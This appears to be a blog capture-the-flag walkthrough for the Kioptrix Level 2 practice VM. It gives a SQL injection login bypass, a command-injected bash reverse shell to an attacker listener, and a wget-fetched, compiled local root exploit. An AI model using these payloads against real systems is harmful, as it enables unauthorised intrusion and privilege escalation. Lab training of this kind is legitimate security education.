Introduction
In this post, You will learn to CTF the kioptrix level 2 box and If you have any doubt comment down below.
To download Kioptrix level 2 box [Click here]
KIOPTRIX: LEVEL 1.1 (#2)
Finding target IP
Nmap scan
SQL injection
Send payload
Exploit the payload
Post enumeration
Finding target IP
To find the target IP I will just enter arp-scan -l, and you can also enter netdiscover command.
arp-scan -l
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-15_54_21-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x295.webp)
I have found the target IP address, it is 192.168.1.41
Now, let’s do a Nmap scan to find service and version and the OS
Nmap scan
While doing the Nmap scan, I have found the port 80 is open so, I will enter the target IP in a browser.
nmap -A 192.168.1.41
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-16_00_27-.webp)
SQL injection
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-16_03_17-192.168.1.41-Opera.png)
I thought of doing a SQL injection attack, and you know what it was successful
Username: 1′ or ‘1’=’1
Password: 1′ or ‘1’=’1
Just copy and paste the above username and password, and then you will be seeing this page.
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-16_16_21-192.168.1.41_index.php-Opera.webp)
Now, let’s use the reverse tcp shell to connect to the target.
Reverse TCP shell
Open a new terminal and enter this command ????????
nc -nvlp 1234
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-16_56_23-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1.webp)
Now enter the below payload and instead of the IP address add your eth0 IP
;bash -i >& /dev/tcp/192.168.1.2/1234 0>&1
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-17_01_37-192.168.1.41_index.php-Opera.webp)
As soon as you give submit, your terminal will get a metrepreter shell
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-17_20_30-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Post enumeration
Now, We are having normal user access but not the root.
If we want to access the root.
id
uname -a
cd /tmp
wget https://www.exploit-db.com/download/9542 –no-check-certificate
mv 9542 shell.c
gcc shell.c
./a.out
id
whoami
![](http://techyrick.com/wp-content/uploads/2022/01/2022-01-18-17_36_52-Hack-The-Kioptrix-Level-1.1-Boot2Root-Challenge-Hacking-Articles-Opera.webp)
Conclusion
It was really very fun to CTF the kioptrix level 2 and If you have any doubt comment down below. I will help you out.
Also Read: Kioptrix level 1 full tutorial